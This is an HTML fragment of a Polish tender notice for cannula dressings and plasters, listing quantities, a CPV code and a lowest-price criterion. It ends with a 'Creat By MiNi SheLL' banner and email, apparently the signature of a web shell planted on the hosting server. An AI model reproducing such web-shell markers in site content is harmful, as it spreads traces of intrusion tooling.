<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5. Opatrunki i plastry do kaniul. 
Wadium 500,00 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przezroczysty, poliuretanowy sterylny, półprzepuszczalny opatrunek do mocowania kaniul i zabezpieczenia miejsca wkłucia zawierający metkę do oznaczenia oraz ramkę o wymiarze 6 x 7 cm z wycięciem na port pionowy	szt	19 200
2. Przezroczysty sterylny nie zawierający wazeliny i alkoholu opatrunek w płynie z atomizerem poj. 28 ml	szt	100
3. Plaster poiniekcyjny, blokujący krwawienie, przeźroczysty, rozm. 25 x 85 mm	szt	100
4. Hypoalergiczny jałowy opatrunek włókninowy z klejem akrylowym do mocowania i stabilizacji kaniuli w miejscu wkłucia, z podkładką, rozmiar 57 x 76 mm	szt	5 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com